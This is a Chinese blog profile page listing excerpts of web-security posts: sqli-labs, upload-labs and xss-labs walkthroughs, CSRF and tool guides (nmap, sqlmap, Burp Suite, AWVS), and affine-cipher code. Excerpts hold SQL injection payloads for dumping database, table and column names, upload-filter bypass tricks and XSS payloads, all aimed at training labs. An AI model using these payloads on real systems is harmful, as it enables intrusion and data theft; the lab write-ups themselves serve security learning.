自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 sqli-labs靶场通关技巧(46-65)

Less46Order by注入,利用报错注入可以爆出数据库信息暴库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0));爆字段:?sort=1

2020-08-03 18:09:33 406

原创 sqli-labs靶场通关技巧(21-45)

Less21基于’)的cookie报头注入这里在cookie处加密了字符串,将我们的payload经过base64加密即可绕过暴库payload:-admin') union select 1,2,database()#爆表payload:-admin') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#爆字段payload:

2020-08-03 12:19:03 464

原创 sqli-labs靶场通关技巧(1-20)

Less1注入步骤:在参数后面加上单引号,数据库报错,说明存在注入id=1' and 1=1--+,返回正常id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数)暴库payload:id=-1' union select 1,2,dat.

2020-07-26 22:54:13 2132

原创 web渗透测试之信息收集思路及方法

1.域名信息1.1域名对应的IP地址1.1.1判断是否存在cdn如果查出来的IP数量有多个,而且不相同,说明该ip地址不是真实的服务器地址。(1)站长之家:http://ping.chinaz.com/(2)爱站:http://ping.aizhan.com/1.1.2绕过cdn查找网站真实IP(1)查看 IP 与 域名绑定的历史记录 DNSdb查询:https://dnsdb.io/zh-cn/ 微步在线:https://x.th...

2020-07-10 23:26:50 932

原创 文件上传漏洞&文件解析漏洞总结

1.文件上传漏洞原理文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。文件上传漏洞利用条件:(1)能够成功上传木马(2)上传的木马能够被web容器解析执行,所以上传路径要在web容器覆盖范围内。(3)用户能够访问上传的木马,所以得知道上传的木马准确路径。2.常见的检测方式及绕过技巧3.文件解析漏洞3.31文件解析.

2020-07-09 23:40:20 1154

原创 upload-labs靶场通关姿势(11-19)

Pass 11绕过方法:00截断因为截断条件是php版本小于5.3.4,php的magic_quotes_gpc为OFF状态,所以得先在相应的php版本目录下找到配置文件php.ini,然后把magic_quotes_gpc的状态修改为OFF,修改完之后重启一下服务就可以了。用Burp Suite代理构造sava_path=/upload/ok.php%00,然后再filename处修改文件拓展名为png(或jpg、gif)源码分析$is_upload = fa..

2020-07-08 23:12:29 476

原创 upload-labs靶场通关姿势(1-10)

Pass 01绕过方法:js绕过浏览按F12,找到限制文件类型的参数,修改为php即可上传。源码分析<script type="text/javascript"> function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") {...

2020-07-07 23:38:38 518

原创 csrf漏洞简介及实战演示

简介CSRF(Cross-site request forgery)中文名叫跨站请求伪造。csrf不攻击网站服务器,而是冒充用户在站内的正常操作。攻击者盗用被攻击者的身份,以被攻击者的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以被攻击者的名义发送邮件、发消息,盗取账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。原理实战演示靶场:dvwa环境:Windows 101、修改密码,并用burpsuite拦截请求包2、用burpsuite生成

2020-06-15 00:14:13 1104

原创 扫描工具nmap常用参数及使用方法

简介Nmap (Network Mapper) 即网络映射器的意思,是一款开放源代码的网络探测和安全审核的工具。可以用来扫描网络上存活主机、扫描主机端口以及识别操作系统等,是安全人员用作信息收集的好帮手。功能• 主机探测——扫描网络存活主机• 端口扫描——扫描主机开放的端口• 版本检测——识别远程设备上的网络服务以确定应用程序名称和版本号• 系统检测——识别网络设备的操作系统和硬件特性• 脚本交互——与编写的脚本常用参数sS 进行TCP SYN扫描(不会产生日志)-sA 进行TCP

2020-06-08 00:56:48 3053

原创 SQL注入神器——sqlmap的常用参数、方法总结

简介Sqlmap是一款开源的自动化SQL注入工具,是集获取数据库信息、获取主机权限、读写文件和提权等功能于一身的强大注入工具。支持的数据库MySQLOraclePostgreSQLMicrosoft SQL ServerMicrosoft AccessIBM DB2SQLiteFirebirdSybaseSAP MaxDB支持的注入模式布尔的盲注——根据返回页面判断条件真假的注入时间的盲注——用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断报错注入——把注入

2020-06-06 12:55:49 843 1

原创 测试工具 BurpSuite2.0.11使用简单介绍

简介BurpSuite是一款基于java语言开发的安全测试工具,安装BurpSuite之前需安装java环境,安装方法可自行百度。BurpSuite是一款集代理、爬虫、漏洞扫描、编码解码等功能于一身的工具,可以说是安全测试人员必备的一款工具。主要模块Dashboard(仪表盘)——显示任务、实践日志等Target(目标)——爬行、分析目标网站目录结构Proxy(代理)——截获、拦截、修改客户端到服务器的HTTP/HTTPS数据包Intruder(入侵)——自动实施各种定制攻击,包括资源枚举、数

2020-06-06 00:41:29 1839 1

原创 扫描工具awvs简单使用介绍

一、 AWVS功能模块1、Web Scanner——web安全漏洞扫描功能2、Site Crawler ——爬虫功能(遍历站点目录结构)3、Target Finder ——端口扫描功能(与nmap相似)4、Subdomain Scanner ——子域名扫描功能5、Blind SQL Injection ——SQL盲注测试工具6、HTTP Editor ——HTTP数据包请求编辑器7、HTTP Sniffer ——HTTP协议嗅探工具8、HTTP Fuzzer ——HTTP模糊测试工具9、A

2020-05-31 19:03:03 2143

原创 python暴力破解仿射密码

#暴力破解仿射密码def decrypt(): k1 = [1,3,5,7,9,11,15,17,19,21,23,25] n = 1 ny = [] for i in k1: while (i * n) % 26 != 1: n += 1 ny.append(n) f = open('cipher08.txt') w = open('plain08.txt','w') cipher = f.read() p = [] for k1 in ny: for k2 i

2020-05-26 23:01:06 1129

原创 python实现仿射密码加解密

仿射密码仿射密码是一种替换密码。它是一个字母对一个字母的。它的加密函数是 Ek(x)=(k1x+k2) mod n(其中k1和n互质,n是字母的数目)解码函数是 Dk(x)=ny(x- k2) mod n (其中ny代表逆元,满足(k1*ny) mod n = 1)代码实现因为用到文件交互,所以需把密码文件和此算法放在同一文件夹中,或者修改代码里面的密码文件路径。#仿射密码加密与解密实现算法# -*- coding=utf-8 -*-#输入密钥def accept(): k1,k2 =

2020-05-26 22:37:16 2667

原创 xss漏洞原理应用及常用payload总结

xss简介XSS攻击全称跨站脚本攻击(Cross Site Scripting),但为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一般只要有用户输入的地方,就可能会出现XSS漏洞。可能造成的危害网站弹框(刷流量)网站挂马会话劫持控制目标数据Cookie被盗取用户提权账号被盗强制发送电子邮件尽量DDOS蠕虫攻

2020-05-26 00:56:15 5557

原创 xss-labs靶场训练(14-20)

第十四关这一关iframe调用的文件地址访问失败,已经无法测试了。这关主要考察exif xss漏洞,具体可以参考前辈的先知文章:exif xss第十五关后台关键代码:<html ng-app><head> <meta charset="utf-8"> <script src="angular.min.js"></script><script>window.alert = function

2020-05-25 00:21:28 1696

原创 xss-labs靶场训练(10-13关)

第十关先用<script>alert(xss)</script>试试这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。把三个参数都传进去试试看:http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3发现t_sort可以传入参数,构造Payload:t_sort=<sc

2020-05-23 22:22:29 889

原创 xss-labs靶场训练(5-9关)

第一关先试一下经典的payload:这里把script过滤了onclick也被过滤了onmouseover也同样被过滤了,尝试用标签执行javascript:伪协议。Payload:”><a href=javascript:alert()>xss</a>`点击一下搜索按钮左侧的xss就成功弹窗了后台关键代码:<?php ini_set("display_errors", 0);$str = strtolower($_GET["keywor

2020-05-21 23:08:17 568

原创 xss-labs靶场训练(1~4关)

第一关前端F12查看代码:这里只能看到参数test输出在h2里面,可以尝试直接构造payload:<script>alert(/xss/)</script>成功!后台关键源码:<?php ini_set("display_errors", 0);$str = $_GET["name"];echo "<h2 align=center>欢迎用户".$str."</h2>";?>这里是以GET方法获取参数name,并直接输出

2020-05-16 22:39:56 519

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除